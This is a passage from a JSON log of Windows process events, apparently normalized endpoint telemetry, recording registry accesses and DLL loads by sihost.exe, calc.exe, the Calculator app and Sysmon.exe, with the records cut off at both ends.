"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Phone\\ShellUI", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Phone\\ShellUI\\WindowSizing", - 
"registry_value": "WindowSizing", - "timestamp": 131883573245730000, - "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" - }, - { - "event_type": "registry", - "pid": 2612, - "process_name": "sihost.exe", - "process_path": "c:\\windows\\system32\\sihost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Phone\\ShellUI\\WindowSizing", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Phone\\ShellUI\\WindowSizing\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573245730000, - "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" - }, - { - "event_type": "registry", - "pid": 2612, - "process_name": "sihost.exe", - "process_path": "c:\\windows\\system32\\sihost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Phone\\ShellUI", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Phone\\ShellUI\\WindowSizing", - "registry_value": "WindowSizing", - "timestamp": 131883573245730000, - "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" - }, - { - "event_type": "registry", - "pid": 2612, - "process_name": "sihost.exe", - "process_path": "c:\\windows\\system32\\sihost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Phone\\ShellUI\\WindowSizing", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Phone\\ShellUI\\WindowSizing\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573245730000, - "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" - }, - { - "event_type": "image_load", - "image_name": "MrmCoreR.dll", - "image_path": "C:\\Windows\\System32\\MrmCoreR.dll", - "pid": 4724, - "process_name": "calc.exe", - 
"process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883573246200016, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "registry", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsCalculator_10.1809.2731.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri", - "registry_value": "C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsCalculator_10.1809.2731.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri", - "timestamp": 131883573246509984, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "registry", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsCalculator_10.1809.2731.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri\\1d48b5d987985a6\\fae8ab0e", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsCalculator_10.1809.2731.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri\\1d48b5d987985a6\\fae8ab0e\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883573246509984, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": 
"registry", - "pid": 7276, - "process_name": "Calculator.exe", - "process_path": "C:\\Program Files\\WindowsApps\\Microsoft.WindowsCalculator_10.1809.2731.0_x64__8wekyb3d8bbwe\\Calculator.exe", - "registry_key": "\\REGISTRY\\A\\{7501d5b5-61af-98ea-ad0b-4867d3d594e3}", - "registry_path": "\\REGISTRY\\A\\{7501d5b5-61af-98ea-ad0b-4867d3d594e3}\\LocalState", - "registry_value": "LocalState", - "timestamp": 131883573246509984, - "unique_pid": "{42FC7E13-C6C3-5C05-0000-00109DB64001}" - }, - { - "event_type": "registry", - "pid": 7276, - "process_name": "Calculator.exe", - "process_path": "C:\\Program Files\\WindowsApps\\Microsoft.WindowsCalculator_10.1809.2731.0_x64__8wekyb3d8bbwe\\Calculator.exe", - "registry_key": "\\REGISTRY\\A\\{7501d5b5-61af-98ea-ad0b-4867d3d594e3}", - "registry_path": "\\REGISTRY\\A\\{7501d5b5-61af-98ea-ad0b-4867d3d594e3}\\LocalState", - "registry_value": "LocalState", - "timestamp": 131883573246509984, - "unique_pid": "{42FC7E13-C6C3-5C05-0000-00109DB64001}" - }, - { - "event_type": "registry", - "pid": 7276, - "process_name": "Calculator.exe", - "process_path": "C:\\Program Files\\WindowsApps\\Microsoft.WindowsCalculator_10.1809.2731.0_x64__8wekyb3d8bbwe\\Calculator.exe", - "registry_key": "\\REGISTRY\\A\\{7501d5b5-61af-98ea-ad0b-4867d3d594e3}", - "registry_path": "\\REGISTRY\\A\\{7501d5b5-61af-98ea-ad0b-4867d3d594e3}\\LocalState", - "registry_value": "LocalState", - "timestamp": 131883573246509984, - "unique_pid": "{42FC7E13-C6C3-5C05-0000-00109DB64001}" - }, - { - "event_type": "registry", - "pid": 7276, - "process_name": "Calculator.exe", - "process_path": "C:\\Program Files\\WindowsApps\\Microsoft.WindowsCalculator_10.1809.2731.0_x64__8wekyb3d8bbwe\\Calculator.exe", - "registry_key": "\\REGISTRY\\A\\{7501d5b5-61af-98ea-ad0b-4867d3d594e3}", - "registry_path": "\\REGISTRY\\A\\{7501d5b5-61af-98ea-ad0b-4867d3d594e3}\\LocalState", - "registry_value": "LocalState", - "timestamp": 131883573246509984, - "unique_pid": 
"{42FC7E13-C6C3-5C05-0000-00109DB64001}" - }, - { - "event_type": "registry", - "pid": 7276, - "process_name": "Calculator.exe", - "process_path": "C:\\Program Files\\WindowsApps\\Microsoft.WindowsCalculator_10.1809.2731.0_x64__8wekyb3d8bbwe\\Calculator.exe", - "registry_key": "\\REGISTRY\\A\\{7501d5b5-61af-98ea-ad0b-4867d3d594e3}\\LocalState", - "registry_path": "\\REGISTRY\\A\\{7501d5b5-61af-98ea-ad0b-4867d3d594e3}\\LocalState\\Mode", - "registry_value": "Mode", - "timestamp": 131883573246509984, - "unique_pid": "{42FC7E13-C6C3-5C05-0000-00109DB64001}" - }, - { - "event_type": "process", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "subtype": "terminate", - "timestamp": 131883573246509984, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573246509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573246509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573246509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573246509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573246509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573246509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573246509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, 
- "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573246509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573246509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573246509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573246509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - 
"registry_value": "Disallowed", - "timestamp": 131883573246509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573246509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573246509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573246509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573246509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573246509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573246509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573246509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573246509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573246509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { 
- "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573246509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573246509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573246509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "twinui.dll", - "image_path": "C:\\Windows\\System32\\twinui.dll", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883573244650000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - 
"timestamp": 131883573246670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573246670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573246670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573246830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573246830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - 
"process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573246830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573246830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573246830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573246830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 
"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573246830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573246830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573246830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573246830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573246830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": 
"Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573246830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573246830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573246830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573246830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 
131883573246830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573246830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573246830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573246830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": 